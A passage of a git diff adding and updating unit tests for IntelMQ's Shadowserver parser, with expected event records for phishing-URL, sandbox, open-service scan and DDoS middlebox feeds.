+   'classification.identifier' : 'phish-url',
+   'classification.taxonomy' : 'fraud',
+   'classification.type' : 'phishing',
+   'source.fqdn' : 'priceless-pare.example.net',
+   'extra.source' : 'openphish.com',
+   'extra.source.naics' : 518210,
+   'extra.source.sector' : 'Communications, Service Provider, and Hosting Service',
+   'source.url' : 'https://priceless-pare.example.net/Postal-/acec6/',
+   'feed.name' : 'Phish URL',
+   'raw' : utils.base64_encode('\n'.join([EXAMPLE_LINES[0], EXAMPLE_LINES[1]])),
+   'source.asn' : 64512,
+   'source.geolocation.cc' : 'US',
+   'source.geolocation.city' : 'BUFFALO',
+   'source.geolocation.region' : 'NEW YORK',
+   'source.ip' : '172.245.0.0',
+   'time.observation' : '2022-01-07T00:00:00+00:00',
+   'time.source' : '2022-02-01T08:00:07+00:00'
+},
+{
+   '__type' : 'Event',
+   'classification.identifier' : 'phish-url',
+   'classification.taxonomy' : 'fraud',
+   'classification.type' : 'phishing',
+   'source.fqdn' : 'mailyahooattt.example.net',
+   'extra.source' : 'openphish.com',
+   'extra.source.sector' : 'Professional, Scientific, and Technical Services',
+   'source.url' : 'https://mailyahooattt.example.net/',
+   'feed.name' : 'Phish URL',
+   'raw' : utils.base64_encode('\n'.join([EXAMPLE_LINES[0], EXAMPLE_LINES[2]])),
+   'source.asn' : 64512,
+   'source.geolocation.cc' : 'US',
+   'source.geolocation.city' : 'SAN FRANCISCO',
+   'source.geolocation.region' : 'CALIFORNIA',
+   'source.ip' : '199.34.0.0',
+   'time.observation' : '2022-01-07T00:00:00+00:00',
+   'time.source' : '2022-02-01T08:00:07+00:00'
+},
+{
+   '__type' : 'Event',
+   'classification.identifier' : 'phish-url',
+   'classification.taxonomy' : 'fraud',
+   'classification.type' : 'phishing',
+   'source.fqdn' : 'www.example.net',
+   'extra.source' : 'openphish.com',
+   'extra.source.naics' : 519130,
+   'extra.source.sector' : 'Communications, Service Provider, and Hosting Service',
+   'source.url' : 'https://www.example.net/viewer/vbid-730ec2b1-omsttuer',
+   'feed.name' : 'Phish URL',
+   'raw' : utils.base64_encode('\n'.join([EXAMPLE_LINES[0], EXAMPLE_LINES[3]])),
+   'source.asn' : 64512,
+   'source.geolocation.cc' : 'US',
+   'source.geolocation.city' : 'DRAPER',
+   'source.geolocation.region' : 'UTAH',
+   'source.ip' : '216.58.0.0',
+   'time.observation' : '2022-01-07T00:00:00+00:00',
+   'time.source' : '2022-02-01T08:00:07+00:00'
+}
+]
+
+
+class TestShadowserverParserBot(test.BotTestCase, unittest.TestCase):
+    """
+    A TestCase for a ShadowserverParserBot.
+    """
+
+    @classmethod
+    def set_bot(cls):
+        cls.bot_reference = ShadowserverParserBot
+        cls.default_input_message = EXAMPLE_REPORT
+
+    def test_event(self):
+        """ Test if correct Event has been produced. """
+        self.run_bot()
+        for i, EVENT in enumerate(EVENTS):
+            self.assertMessageEqual(i, EVENT)
+
+
+if __name__ == '__main__':  # pragma: no cover
+    unittest.main()
diff --git a/intelmq/tests/bots/parsers/shadowserver/test_sandbox_conn.py b/intelmq/tests/bots/parsers/shadowserver/test_sandbox_conn.py
new file mode 100644
index 000000000..c5da82346
--- /dev/null
+++ b/intelmq/tests/bots/parsers/shadowserver/test_sandbox_conn.py
@@ -0,0 +1,99 @@
+# SPDX-FileCopyrightText: 2022 Shadowserver Foundation
+#
+# SPDX-License-Identifier: AGPL-3.0-or-later
+
+# -*- coding: utf-8 -*-
+
+import os
+import unittest
+
+import intelmq.lib.test as test
+import intelmq.lib.utils as utils
+from intelmq.bots.parsers.shadowserver.parser import ShadowserverParserBot
+
+with open(os.path.join(os.path.dirname(__file__),
+                       'testdata/sandbox_conn.csv')) as handle:
+    EXAMPLE_FILE = handle.read()
+EXAMPLE_LINES = EXAMPLE_FILE.splitlines()
+
+EXAMPLE_REPORT = {'feed.name': 'Sandbox Connections',
+                  "raw": utils.base64_encode(EXAMPLE_FILE),
+                  "__type": "Report",
+                  "time.observation": "2022-01-07T00:00:00+00:00",
+                  "extra.file_name": "2022-01-07-sandbox_conn-test.csv",
+                  }
+EVENTS = [
+        {
+   '__type' : 'Event',
+   'classification.identifier' : 'sandbox-conn',
+   'classification.taxonomy' : 'malicious-code',
+   'classification.type' : 'malware-distribution',
+   'destination.fqdn' : 'time.windows.com',
+   'feed.name' : 'Sandbox Connections',
+   'malware.hash.md5' : 'b575ce6dcce6502a8431db5610135c25',
+   'protocol.transport' : 'udp',
+   'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
+                                     EXAMPLE_LINES[1]])),
+   'source.asn' : 8075,
+   'source.geolocation.cc' : 'US',
+   'source.ip' : '40.119.6.228',
+   'source.port' : 123,
+   'time.observation' : '2022-01-07T00:00:00+00:00',
+   'time.source' : '2022-01-10T00:00:03+00:00'
+},
+        {
+   '__type' : 'Event',
+   'classification.identifier' : 'sandbox-conn',
+   'classification.taxonomy' : 'malicious-code',
+   'classification.type' : 'malware-distribution',
+   'feed.name' : 'Sandbox Connections',
+   'malware.hash.md5' : 'c0d947f9a8685b0d9f3efdba966389c2',
+   'protocol.transport' : 'tcp',
+   'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
+                                     EXAMPLE_LINES[2]])),
+   'source.asn' : 3356,
+   'source.geolocation.cc' : 'US',
+   'source.ip' : '8.252.70.126',
+   'source.port' : 80,
+   'time.observation' : '2022-01-07T00:00:00+00:00',
+   'time.source' : '2022-01-10T00:00:03+00:00'
+},
+{
+   '__type' : 'Event',
+   'classification.identifier' : 'sandbox-conn',
+   'classification.taxonomy' : 'malicious-code',
+   'classification.type' : 'malware-distribution',
+   'feed.name' : 'Sandbox Connections',
+   'malware.hash.md5' : 'c0d947f9a8685b0d9f3efdba966389c2',
+   'protocol.transport' : 'tcp',
+   'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
+                                     EXAMPLE_LINES[3]])),
+   'source.asn' : 8075,
+   'source.geolocation.cc' : 'US',
+   'source.ip' : '52.109.8.22',
+   'source.port' : 443,
+   'time.observation' : '2022-01-07T00:00:00+00:00',
+   'time.source' : '2022-01-10T00:00:03+00:00'
+}
+]
+
+
+class TestShadowserverParserBot(test.BotTestCase, unittest.TestCase):
+    """
+    A TestCase for a ShadowserverParserBot.
+    """
+
+    @classmethod
+    def set_bot(cls):
+        cls.bot_reference = ShadowserverParserBot
+        cls.default_input_message = EXAMPLE_REPORT
+
+    def test_event(self):
+        """ Test if correct Event has been produced. """
+        self.run_bot()
+        for i, EVENT in enumerate(EVENTS):
+            self.assertMessageEqual(i, EVENT)
+
+
+if __name__ == '__main__':  # pragma: no cover
+    unittest.main()
diff --git a/intelmq/tests/bots/parsers/shadowserver/test_sandbox_dns.py b/intelmq/tests/bots/parsers/shadowserver/test_sandbox_dns.py
new file mode 100644
index 000000000..70cf1eee5
--- /dev/null
+++ b/intelmq/tests/bots/parsers/shadowserver/test_sandbox_dns.py
@@ -0,0 +1,95 @@
+# SPDX-FileCopyrightText: 2022 Shadowserver Foundation
+#
+# SPDX-License-Identifier: AGPL-3.0-or-later
+
+# -*- coding: utf-8 -*-
+
+import os
+import unittest
+
+import intelmq.lib.test as test
+import intelmq.lib.utils as utils
+from intelmq.bots.parsers.shadowserver.parser import ShadowserverParserBot
+
+with open(os.path.join(os.path.dirname(__file__),
+                       'testdata/sandbox_dns.csv')) as handle:
+    EXAMPLE_FILE = handle.read()
+EXAMPLE_LINES = EXAMPLE_FILE.splitlines()
+
+EXAMPLE_REPORT = {'feed.name': 'Sandbox DNS',
+                  "raw": utils.base64_encode(EXAMPLE_FILE),
+                  "__type": "Report",
+                  "time.observation": "2022-01-07T00:00:00+00:00",
+                  "extra.file_name": "2022-01-07-sandbox_dns-test.csv",
+                  }
+EVENTS = [
+        {
+   '__type' : 'Event',
+   'classification.identifier' : 'sandbox-dns',
+   'classification.taxonomy' : 'other',
+   'classification.type' : 'other',
+   'extra.request' : 'time.windows.com',
+   'extra.response' : '40.119.6.228',
+   'extra.dns_query_type' : 'A',
+   'feed.name' : 'Sandbox DNS',
+   'malware.hash.md5' : 'b575ce6dcce6502a8431db5610135c25',
+   'protocol.application' : 'dns',
+   'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
+                                     EXAMPLE_LINES[1]])),
+   'time.observation' : '2022-01-07T00:00:00+00:00',
+   'time.source' : '2022-01-10T00:00:02+00:00'
+},
+{
+   '__type' : 'Event',
+   'classification.identifier' : 'sandbox-dns',
+   'classification.taxonomy' : 'other',
+   'classification.type' : 'other',
+   'extra.request' : 'time.windows.com',
+   'extra.response' : '40.119.6.228',
+   'extra.dns_query_type' : 'A',
+   'feed.name' : 'Sandbox DNS',
+   'malware.hash.md5' : '807679198a39c80d3ca07e60fd51b581',
+   'protocol.application' : 'dns',
+   'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
+                                     EXAMPLE_LINES[2]])),
+   'time.observation' : '2022-01-07T00:00:00+00:00',
+   'time.source' : '2022-01-10T00:00:08+00:00'
+},
+{
+   '__type' : 'Event',
+   'classification.identifier' : 'sandbox-dns',
+   'classification.taxonomy' : 'other',
+   'classification.type' : 'other',
+   'extra.request' : 'client-office365-tas.msedge.net',
+   'extra.response' : '13.107.5.88',
+   'extra.dns_query_type' : 'A',
+   'feed.name' : 'Sandbox DNS',
+   'malware.hash.md5' : 'd97e973b9bf073bd3a217425259cea26',
+   'protocol.application' : 'dns',
+   'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
+                                     EXAMPLE_LINES[3]])),
+   'time.observation' : '2022-01-07T00:00:00+00:00',
+   'time.source' : '2022-01-10T00:00:20+00:00'
+}
+]
+
+
+class TestShadowserverParserBot(test.BotTestCase, unittest.TestCase):
+    """
+    A TestCase for a ShadowserverParserBot.
+    """
+
+    @classmethod
+    def set_bot(cls):
+        cls.bot_reference = ShadowserverParserBot
+        cls.default_input_message = EXAMPLE_REPORT
+
+    def test_event(self):
+        """ Test if correct Event has been produced. """
+        self.run_bot()
+        for i, EVENT in enumerate(EVENTS):
+            self.assertMessageEqual(i, EVENT)
+
+
+if __name__ == '__main__':  # pragma: no cover
+    unittest.main()
diff --git a/intelmq/tests/bots/parsers/shadowserver/test_sandbox_url.py b/intelmq/tests/bots/parsers/shadowserver/test_sandbox_url.py
new file mode 100644
index 000000000..91b0154b8
--- /dev/null
+++ b/intelmq/tests/bots/parsers/shadowserver/test_sandbox_url.py
@@ -0,0 +1,104 @@
+# SPDX-FileCopyrightText: 2022 Shadowserver Foundation
+#
+# SPDX-License-Identifier: AGPL-3.0-or-later
+
+# -*- coding: utf-8 -*-
+
+import os
+import unittest
+
+import intelmq.lib.test as test
+import intelmq.lib.utils as utils
+from intelmq.bots.parsers.shadowserver.parser import ShadowserverParserBot
+
+with open(os.path.join(os.path.dirname(__file__),
+                       'testdata/sandbox_url.csv')) as handle:
+    EXAMPLE_FILE = handle.read()
+EXAMPLE_LINES = EXAMPLE_FILE.splitlines()
+
+EXAMPLE_REPORT = {'feed.name': 'Sandbox URL',
+                  "raw": utils.base64_encode(EXAMPLE_FILE),
+                  "__type": "Report",
+                  "time.observation": "2022-01-07T00:00:00+00:00",
+                  "extra.file_name": "2022-01-07-sandbox_url-test.csv",
+                  }
+EVENTS = [
+{
+   '__type' : 'Event',
+   'classification.identifier' : 'sandbox-url',
+   'classification.taxonomy' : 'malicious-code',
+   'classification.type' : 'malware-distribution',
+   'destination.fqdn' : 'www.msftncsi.com',
+   'extra.http_request_method' : 'GET',
+   'destination.url' : 'http://www.msftncsi.com/ncsi.txt',
+   'extra.user_agent' : 'Microsoft NCSI',
+   'feed.name' : 'Sandbox URL',
+   'malware.hash.md5' : '37514b54e679a5313334e830ad780ec7',
+   'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
+                                     EXAMPLE_LINES[1]])),
+   'source.asn' : 20940,
+   'source.geolocation.cc' : 'US',
+   'source.ip' : '23.196.47.89',
+   'time.observation' : '2022-01-07T00:00:00+00:00',
+   'time.source' : '2022-01-10T00:01:13+00:00'
+},
+{
+   '__type' : 'Event',
+   'classification.identifier' : 'sandbox-url',
+   'classification.taxonomy' : 'malicious-code',
+   'classification.type' : 'malware-distribution',
+   'destination.fqdn' : 'www.download.windowsupdate.com',
+   'extra.http_request_method' : 'GET',
+   'destination.url' : 'http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab',
+   'extra.user_agent' : 'Microsoft-CryptoAPI/6.1',
+   'feed.name' : 'Sandbox URL',
+   'malware.hash.md5' : '37514b54e679a5313334e830ad780ec7',
+   'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
+                                     EXAMPLE_LINES[2]])),
+   'source.asn' : 15133,
+   'source.geolocation.cc' : 'US',
+   'source.ip' : '72.21.81.240',
+   'time.observation' : '2022-01-07T00:00:00+00:00',
+   'time.source' : '2022-01-10T00:01:28+00:00'
+},
+{
+   '__type' : 'Event',
+   'classification.identifier' : 'sandbox-url',
+   'classification.taxonomy' : 'malicious-code',
+   'classification.type' : 'malware-distribution',
+   'destination.fqdn' : 'crl.microsoft.com',
+   'extra.http_request_method' : 'GET',
+   'destination.url' : 'http://crl.microsoft.com/pki/crl/products/MicTimStaPCA_2010-07-01.crl',
+   'extra.user_agent' : 'Microsoft-CryptoAPI/6.1',
+   'feed.name' : 'Sandbox URL',
+   'malware.hash.md5' : 'e97ea2820c0d79f3f3ca241d4dcd1060',
+   'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
+                                     EXAMPLE_LINES[3]])),
+   'source.asn' : 20940,
+   'source.geolocation.cc' : 'US',
+   'source.ip' : '23.56.4.57',
+   'time.observation' : '2022-01-07T00:00:00+00:00',
+   'time.source' : '2022-01-10T00:08:24+00:00'
+}
+]
+
+
+class TestShadowserverParserBot(test.BotTestCase, unittest.TestCase):
+    """
+    A TestCase for a ShadowserverParserBot.
+    """
+
+    @classmethod
+    def set_bot(cls):
+        cls.bot_reference = ShadowserverParserBot
+        cls.default_input_message = EXAMPLE_REPORT
+
+    def test_event(self):
+        """ Test if correct Event has been produced. """
+        self.run_bot()
+        for i, EVENT in enumerate(EVENTS):
+            self.assertMessageEqual(i, EVENT)
+
+
+if __name__ == '__main__':  # pragma: no cover
+    unittest.main()
diff --git a/intelmq/tests/bots/parsers/shadowserver/test_scan_adb.py b/intelmq/tests/bots/parsers/shadowserver/test_scan_adb.py
index 9e8926683..6bc6e6146 100644
--- a/intelmq/tests/bots/parsers/shadowserver/test_scan_adb.py
+++ b/intelmq/tests/bots/parsers/shadowserver/test_scan_adb.py
@@ -43,9 +43,9 @@
            'extra.name': 'hlteuc',
            'extra.model': 'SAMSUNG-SM-N900A',
            'extra.device': 'hlteatt',
+           'extra.tag': 'adb',
            'extra.naics': 518210,
            'extra.sic': 737415,
-           'extra.tag': 'adb',
            'source.reverse_dns': '36-239-124-210.dynamic-ip.hinet.net',
            },
           {'__type': 'Event',
diff --git a/intelmq/tests/bots/parsers/shadowserver/test_scan_amqp.py b/intelmq/tests/bots/parsers/shadowserver/test_scan_amqp.py
new file mode 100644
index 000000000..d52d8667b
--- /dev/null
+++ b/intelmq/tests/bots/parsers/shadowserver/test_scan_amqp.py
@@ -0,0 +1,144 @@
+# SPDX-FileCopyrightText: 2022 Shadowserver Foundation
+#
+# SPDX-License-Identifier: AGPL-3.0-or-later
+
+# -*- coding: utf-8 -*-
+
+import os
+import unittest
+
+import intelmq.lib.test as test
+import intelmq.lib.utils as utils
+from intelmq.bots.parsers.shadowserver.parser import ShadowserverParserBot
+
+with open(os.path.join(os.path.dirname(__file__),
+                       'testdata/scan_amqp.csv')) as handle:
+    EXAMPLE_FILE = handle.read()
+EXAMPLE_LINES = EXAMPLE_FILE.splitlines()
+
+EXAMPLE_REPORT = {'feed.name': 'Accessible AMQP',
+                  "raw": utils.base64_encode(EXAMPLE_FILE),
+                  "__type": "Report",
+                  "time.observation": "2022-01-07T00:00:00+00:00",
+                  "extra.file_name": "2022-01-07-scan_amqp-test.csv",
+                  }
+EVENTS = [
+{
+   '__type' : 'Event',
+   'classification.identifier' : 'accessible-amqp',
+   'classification.taxonomy' : 'vulnerable',
+   'classification.type' : 'vulnerable-system',
+   'extra.capabilities' : 'publisher_confirms,exchange_exchange_bindings,basic.nack,consumer_cancel_notify,connection.blocked,consumer_priorities,authentication_failure_close,per_consumer_qos',
+   'extra.class' : '10',
+   'extra.cluster_name' : 'rabbit@iZuf63m0nnq9bwf7lhjxrkZ',
+   'extra.locales' : 'en_US',
+   'extra.mechanisms' : 'PLAIN AMQPLAIN',
+   'extra.message_length' : '509',
+   'extra.method' : '10',
+   'extra.platform' : 'Erlang/OTP',
+   'extra.product' : 'RabbitMQ',
+   'extra.product_version' : '3.3.5',
+   'extra.naics' : 518210,
+   'extra.tag' : 'amqp',
+   'extra.version_minor' : '9',
+   'feed.name' : 'Accessible AMQP',
+   'protocol.application' : 'amqp',
+   'protocol.transport' : 'tcp',
+   'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
+                                     EXAMPLE_LINES[1]])),
+   'source.asn' : 37963,
+   'source.geolocation.cc' : 'CN',
+   'source.geolocation.city' : 'SHANGHAI',
+   'source.geolocation.region' : 'SHANGHAI SHI',
+   'source.ip' : '47.103.0.0',
+   'source.port' : 5672,
+   'time.observation' : '2022-01-07T00:00:00+00:00',
+   'time.source' : '2022-01-10T04:32:13+00:00'
+},
+{
+   '__type' : 'Event',
+   'classification.identifier' : 'accessible-amqp',
+   'classification.taxonomy' : 'vulnerable',
+   'classification.type' : 'vulnerable-system',
+   'extra.capabilities' : 'publisher_confirms,exchange_exchange_bindings,basic.nack,consumer_cancel_notify,connection.blocked,consumer_priorities,authentication_failure_close,per_consumer_qos,direct_reply_to',
+   'extra.class' : '10',
+   'extra.cluster_name' : 'rabbit@mtk-breizh',
+   'extra.locales' : 'en_US',
+   'extra.mechanisms' : 'AMQPLAIN PLAIN',
+   'extra.message_length' : '509',
+   'extra.method' : '10',
+   'extra.platform' : 'Erlang/OTP 24.0.3',
+   'extra.product' : 'RabbitMQ',
+   'extra.product_version' : '3.8.19',
+   'extra.naics' : 518210,
+   'extra.tag' : 'amqp',
+   'extra.version_minor' : '9',
+   'feed.name' : 'Accessible AMQP',
+   'protocol.application' : 'amqp',
+   'protocol.transport' : 'tcp',
+   'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
+                                     EXAMPLE_LINES[2]])),
+   'source.asn' : 16276,
+   'source.geolocation.cc' : 'DE',
+   'source.geolocation.city' : 'SAARBRUCKEN',
+   'source.geolocation.region' : 'SAARLAND',
+   'source.ip' : '141.95.0.0',
+   'source.port' : 5672,
+   'time.observation' : '2022-01-07T00:00:00+00:00',
+   'time.source' : '2022-01-10T04:32:13+00:00'
+},
+{
+   '__type' : 'Event',
+   'classification.identifier' : 'accessible-amqp',
+   'classification.taxonomy' : 'vulnerable',
+   'classification.type' : 'vulnerable-system',
+   'extra.capabilities' : 'publisher_confirms,exchange_exchange_bindings,basic.nack,consumer_cancel_notify,connection.blocked,consumer_priorities,authentication_failure_close,per_consumer_qos,direct_reply_to',
+   'extra.class' : '10',
+   'extra.cluster_name' : 'rabbit@1397a0e9629b',
+   'extra.locales' : 'en_US',
+   'extra.mechanisms' : 'PLAIN AMQPLAIN',
+   'extra.message_length' : '509',
+   'extra.method' : '10',
+   'extra.platform' : 'Erlang/OTP 24.2',
+   'extra.product' : 'RabbitMQ',
+   'extra.product_version' : '3.9.11',
+   'extra.naics' : 454110,
+   'extra.tag' : 'amqp',
+   'extra.version_minor' : '9',
+   'feed.name' : 'Accessible AMQP',
+   'protocol.application' : 'amqp',
+   'protocol.transport' : 'tcp',
+   'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
+                                     EXAMPLE_LINES[3]])),
+   'source.asn' : 14618,
+   'source.geolocation.cc' : 'US',
+   'source.geolocation.city' : 'ASHBURN',
+   'source.geolocation.region' : 'VIRGINIA',
+   'source.ip' : '54.234.0.0',
+   'source.port' : 5672,
+   'source.reverse_dns' : 'ec2-54.234.0.0.compute-1.amazonaws.com',
+   'time.observation' : '2022-01-07T00:00:00+00:00',
+   'time.source' : '2022-01-10T04:32:13+00:00'
+}
+]
+
+
+class TestShadowserverParserBot(test.BotTestCase, unittest.TestCase):
+    """
+    A TestCase for a ShadowserverParserBot.
+    """
+
+    @classmethod
+    def set_bot(cls):
+        cls.bot_reference = ShadowserverParserBot
+        cls.default_input_message = EXAMPLE_REPORT
+
+    def test_event(self):
+        """ Test if correct Event has been produced. """
+        self.run_bot()
+        for i, EVENT in enumerate(EVENTS):
+            self.assertMessageEqual(i, EVENT)
+
+
+if __name__ == '__main__':  # pragma: no cover
+    unittest.main()
diff --git a/intelmq/tests/bots/parsers/shadowserver/test_cisco_smart_install.py b/intelmq/tests/bots/parsers/shadowserver/test_scan_cisco_smart_install.py
similarity index 94%
rename from intelmq/tests/bots/parsers/shadowserver/test_cisco_smart_install.py
rename to intelmq/tests/bots/parsers/shadowserver/test_scan_cisco_smart_install.py
index ee67ac215..46c963a79 100644
--- a/intelmq/tests/bots/parsers/shadowserver/test_cisco_smart_install.py
+++ b/intelmq/tests/bots/parsers/shadowserver/test_scan_cisco_smart_install.py
@@ -11,7 +11,7 @@
 import intelmq.lib.utils as utils
 from intelmq.bots.parsers.shadowserver.parser import ShadowserverParserBot
 
-with open(os.path.join(os.path.dirname(__file__), 'testdata/cisco_smart_install.csv')) as handle:
+with open(os.path.join(os.path.dirname(__file__), 'testdata/scan_cisco_smart_install.csv')) as handle:
     EXAMPLE_FILE = handle.read()
 EXAMPLE_LINES = EXAMPLE_FILE.splitlines()
 
@@ -19,7 +19,7 @@
                   "raw": utils.base64_encode(EXAMPLE_FILE),
                   "__type": "Report",
                   "time.observation": "2015-01-01T00:00:00+00:00",
-                  "extra.file_name": "2019-01-01-cisco_smart_install-test-geo.csv",
+                  "extra.file_name": "2019-01-01-scan_cisco_smart_install-test-geo.csv",
                   }
 EVENTS = [{'__type': 'Event',
            'feed.name': 'Accessible Cisco Smart Install',
diff --git a/intelmq/tests/bots/parsers/shadowserver/test_scan_couchdb.py b/intelmq/tests/bots/parsers/shadowserver/test_scan_couchdb.py
new file mode 100644
index 000000000..1bf6f321c
--- /dev/null
+++ b/intelmq/tests/bots/parsers/shadowserver/test_scan_couchdb.py
@@ -0,0 +1,128 @@
+# SPDX-FileCopyrightText: 2022 Shadowserver Foundation
+#
+# SPDX-License-Identifier: AGPL-3.0-or-later
+
+# -*- coding: utf-8 -*-
+
+import os
+import unittest
+
+import intelmq.lib.test as test
+import intelmq.lib.utils as utils
+from intelmq.bots.parsers.shadowserver.parser import ShadowserverParserBot
+
+with open(os.path.join(os.path.dirname(__file__),
+                       'testdata/scan_couchdb.csv')) as handle:
+    EXAMPLE_FILE = handle.read()
+EXAMPLE_LINES = EXAMPLE_FILE.splitlines()
+
+EXAMPLE_REPORT = {'feed.name': 'Accessible CouchDB Server',
+                  "raw": utils.base64_encode(EXAMPLE_FILE),
+                  "__type": "Report",
+                  "time.observation": "2010-02-10T00:00:00+00:00",
+                  "extra.file_name": "2010-02-10-scan_couchdb-test.csv",
+                  }
+EVENTS = [
+{
+   '__type' : 'Event',
+   'classification.identifier' : 'open-couchdb',
+   'classification.taxonomy' : 'other',
+   'classification.type' : 'other',
+   'extra.couchdb_message' : 'Welcome',
+   'extra.couchdb_version' : '1.6.1',
+   'extra.server_version' : 'CouchDB/1.6.1 (Erlang OTP/18)',
+   'extra.tag' : 'couchdb',
+   'extra.vendor' : 'Ubuntu 16.04',
+   'extra.visible_databases' : '_replicator;_users;test;shops;god',
+   'feed.name' : 'Accessible CouchDB Server',
+   'protocol.application' : 'couchdb',
+   'protocol.transport' : 'tcp',
+   'raw' : utils.base64_encode('\n'.join([EXAMPLE_LINES[0], EXAMPLE_LINES[1]])),
+   'source.asn' : 64512,
+   'source.geolocation.cc' : 'ZZ',
+   'source.geolocation.city' : 'City',
+   'source.geolocation.region' : 'Region',
+   'source.ip' : '192.168.0.1',
+   'source.port' : 5984,
+   'source.reverse_dns' : 'node01.example.com',
+   'time.observation' : '2010-02-10T00:00:00+00:00',
+   'time.source' : '2010-02-10T00:00:00+00:00'
+},
+
+{
+   '__type' : 'Event',
+   'classification.identifier' : 'open-couchdb',
+   'classification.taxonomy' : 'other',
+   'classification.type' : 'other',
+   'extra.couchdb_message' : 'Welcome',
+   'extra.couchdb_version' : '3.2.1',
+   'extra.features' : 'access-ready,partitioned,pluggable-storage-engines,reshard,scheduler',
+   'extra.git_sha' : '244d428af',
+   'extra.server_version' : 'CouchDB/3.2.1 (Erlang OTP/23)',
+   'extra.source.sector' : 'Communications, Service Provider, and Hosting Service',
+   'extra.tag' : 'couchdb',
+   'extra.vendor' : 'The Apache Software Foundation',
+   'feed.name' : 'Accessible CouchDB Server',
+   'protocol.application' : 'couchdb',
+   'protocol.transport' : 'tcp',
+   'raw' : utils.base64_encode('\n'.join([EXAMPLE_LINES[0], EXAMPLE_LINES[2]])),
+   'source.asn' : 64512,
+   'source.geolocation.cc' : 'ZZ',
+   'source.geolocation.city' : 'City',
+   'source.geolocation.region' : 'Region',
+   'source.ip' : '192.168.0.2',
+   'source.port' : 5984,
+   'source.reverse_dns' : 'node02.example.com',
+   'time.observation' : '2010-02-10T00:00:00+00:00',
+   'time.source' : '2010-02-10T00:00:01+00:00'
+},
+
+{
+   '__type' : 'Event',
+   'classification.identifier' : 'open-couchdb',
+   'classification.taxonomy' : 'other',
+   'classification.type' : 'other',
+   'extra.couchdb_message' : 'Welcome',
+   'extra.couchdb_version' : '3.2.1',
+   'extra.features' : 'access-ready,partitioned,pluggable-storage-engines,reshard,scheduler',
+   'extra.git_sha' : '244d428af',
+   'extra.server_version' : 'CouchDB/3.2.1 (Erlang OTP/20)',
+   'extra.source.sector' : 'Retail Trade',
+   'extra.tag' : 'couchdb',
+   'extra.vendor' : 'The Apache Software Foundation',
+   'feed.name' : 'Accessible CouchDB Server',
+   'protocol.application' : 'couchdb',
+   'protocol.transport' : 'tcp',
+   'raw' : utils.base64_encode('\n'.join([EXAMPLE_LINES[0], EXAMPLE_LINES[3]])),
+   'source.asn' : 64512,
+   'source.geolocation.cc' : 'ZZ',
+   'source.geolocation.city' : 'City',
+   'source.geolocation.region' : 'Region',
+   'source.ip' : '192.168.0.3',
+   'source.port' : 5984,
+   'source.reverse_dns' : 'node03.example.com',
+   'time.observation' : '2010-02-10T00:00:00+00:00',
+   'time.source' : '2010-02-10T00:00:02+00:00'
+}
+]
+
+
+class TestShadowserverParserBot(test.BotTestCase, unittest.TestCase):
+    """
+    A TestCase for a ShadowserverParserBot.
+    """
+
+    @classmethod
+    def set_bot(cls):
+        cls.bot_reference = ShadowserverParserBot
+        cls.default_input_message = EXAMPLE_REPORT
+
+    def test_event(self):
+        """ Test if correct Event has been produced. """
+        self.run_bot()
+        for i, EVENT in enumerate(EVENTS):
+            self.assertMessageEqual(i, EVENT)
+
+
+if __name__ == '__main__':  # pragma: no cover
+    unittest.main()
diff --git a/intelmq/tests/bots/parsers/shadowserver/test_scan_db2.py b/intelmq/tests/bots/parsers/shadowserver/test_scan_db2.py
index 7001acab6..78ae1be50 100644
--- a/intelmq/tests/bots/parsers/shadowserver/test_scan_db2.py
+++ b/intelmq/tests/bots/parsers/shadowserver/test_scan_db2.py
@@ -31,6 +31,7 @@
            'extra.tag': 'db2',
            'extra.db2_hostname': 'server1.net',
            'protocol.transport': 'udp',
+           'protocol.application': 'db2',
            'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
                                                  EXAMPLE_LINES[1]])),
            'source.asn': 4837,
@@ -53,6 +54,7 @@
            'extra.tag': 'db2',
            'extra.db2_hostname': 'kronos.net',
            'protocol.transport': 'udp',
+           'protocol.application': 'db2',
            'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
                                                  EXAMPLE_LINES[2]])),
            'source.asn': 3320,
diff --git a/intelmq/tests/bots/parsers/shadowserver/test_scan_ddos_middlebox.py b/intelmq/tests/bots/parsers/shadowserver/test_scan_ddos_middlebox.py
new file mode 100644
index 000000000..9038a79ef
--- /dev/null
+++ b/intelmq/tests/bots/parsers/shadowserver/test_scan_ddos_middlebox.py
@@ -0,0 +1,119 @@
+# SPDX-FileCopyrightText: 2022 Shadowserver Foundation
+#
+# SPDX-License-Identifier: AGPL-3.0-or-later
+
+# -*- coding: utf-8 -*-
+
+import os
+import unittest
+
+import intelmq.lib.test as test
+import intelmq.lib.utils as utils
+from intelmq.bots.parsers.shadowserver.parser import ShadowserverParserBot
+
+with open(os.path.join(os.path.dirname(__file__),
+                       'testdata/scan_ddos_middlebox.csv')) as handle:
+    EXAMPLE_FILE = handle.read()
+EXAMPLE_LINES = EXAMPLE_FILE.splitlines()
+
+EXAMPLE_REPORT = {'feed.name': 'DDoS Middlebox',
+                  "raw": utils.base64_encode(EXAMPLE_FILE),
+                  "__type": "Report",
+                  "time.observation": "2010-02-10T00:00:00+00:00",
+                  "extra.file_name": "2010-02-10-scan_ddos_middlebox-test.csv",
+                  }
+EVENTS = [
+{
+   '__type' : 'Event',
+   'classification.identifier' : 'open-ddos-middlebox',
+   'classification.taxonomy' : 'vulnerable',
+   'classification.type' : 'vulnerable-system',
+   'extra.amplification' : 2,
+   'extra.bytes' : 99,
+   'extra.method' : 'SYN+ACK:PSH',
+   'extra.source_port' : '49002',
+   'feed.name' : 'DDoS Middlebox',
+   'protocol.application' : 'ddos-middlebox',
+   'protocol.transport' : 'tcp',
+   'raw' : utils.base64_encode('\n'.join([EXAMPLE_LINES[0], EXAMPLE_LINES[1]])),
+   'source.asn' : 64512,
